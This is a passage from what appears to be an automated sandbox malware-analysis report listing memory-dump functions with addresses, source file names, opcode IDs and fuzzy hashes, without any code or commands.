                                                            Uniqueness Score: -1.00%

                                                            Function 000DD006, Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699289585.00000000000DD000.00000040.00000001.sdmp, Offset: 000DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_dd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ad9cc13a6a011e10429de670ae28cbcc8f4762df3c5b33e190ccdaac9f284b7
                                                            • Instruction ID: 862e252f9a60e101495f9ea4ea65321a76e78a87cf64885e62db4bf9f14c06e8
                                                            • Opcode Fuzzy Hash: 5ad9cc13a6a011e10429de670ae28cbcc8f4762df3c5b33e190ccdaac9f284b7
                                                            • Instruction Fuzzy Hash: F1216F755093808FCB12CF24D994715BFB1EB86314F28C5EBD8498B697C33AD85ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000CD487, Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699262856.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_cd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 154c55a723e760c04b566e33a5ae0ccd68c4220968849a446f089e6d4f7c7e58
                                                            • Instruction ID: b0a795fe558011ed2b4ae366bbff39579ada9baa4647cf52075beb61fa8171dc
                                                            • Opcode Fuzzy Hash: 154c55a723e760c04b566e33a5ae0ccd68c4220968849a446f089e6d4f7c7e58
                                                            • Instruction Fuzzy Hash: FE11B176504640CFCB02CF10D5C4B1ABFB2FB94314F24C6AED8050B216C336D856CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 000CD573, Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699262856.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_cd000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 154c55a723e760c04b566e33a5ae0ccd68c4220968849a446f089e6d4f7c7e58
                                                            • Instruction ID: f9fb5f17ef0e6e454ff1b202b877d09622f6eebda642dd3d462c3511be441c3f
                                                            • Opcode Fuzzy Hash: 154c55a723e760c04b566e33a5ae0ccd68c4220968849a446f089e6d4f7c7e58
                                                            • Instruction Fuzzy Hash: 44118176504280DFCB16CF14D5C4B1ABFB1FB95314F2885AED8094B656C336D856CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0020125C, Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f57ac10921423f34e310f5b478c7d1540bef39fc42c0f8cdcf3769e261920c3e
                                                            • Instruction ID: 88a7449c988a18d7eac6380fd0ffbcf80a6d57c34e2061a1dd0b77f3b21e5a71
                                                            • Opcode Fuzzy Hash: f57ac10921423f34e310f5b478c7d1540bef39fc42c0f8cdcf3769e261920c3e
                                                            • Instruction Fuzzy Hash: 2EF0E5317681105BC204676DE065A7F32AADFC7B15B12483EE20ACF396DF65DC0083A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002019C9, Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16f510266f23cb6171a96ea1153f56b502a8c4ed5e1891c3d8170d926af22af9
                                                            • Instruction ID: 03aa64c68f4d2d6e0f73258262a7948cfa146fa595f43c58e954ec7e689050ed
                                                            • Opcode Fuzzy Hash: 16f510266f23cb6171a96ea1153f56b502a8c4ed5e1891c3d8170d926af22af9
                                                            • Instruction Fuzzy Hash: DCE0C235B093468FE704CB399868B653BE29B94300F18C26EE84AC72E6EE35D8518A00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 002019D0, Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000029.00000002.699368874.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_41_2_200000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e41cad014698c1b9d4a6e753ddede79fb452d489057e4dd2d90943dba8f97e3
                                                            • Instruction ID: fe83708792f17945f108dc33ac90ff6da0842a8e5c84624b7ae7cc9dc47510de
                                                            • Opcode Fuzzy Hash: 2e41cad014698c1b9d4a6e753ddede79fb452d489057e4dd2d90943dba8f97e3
                                                            • Instruction Fuzzy Hash: 01D05E3470030A8BE304DA2DA859B2233DA57C4314F14C136A508C7295EE31DC908A00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions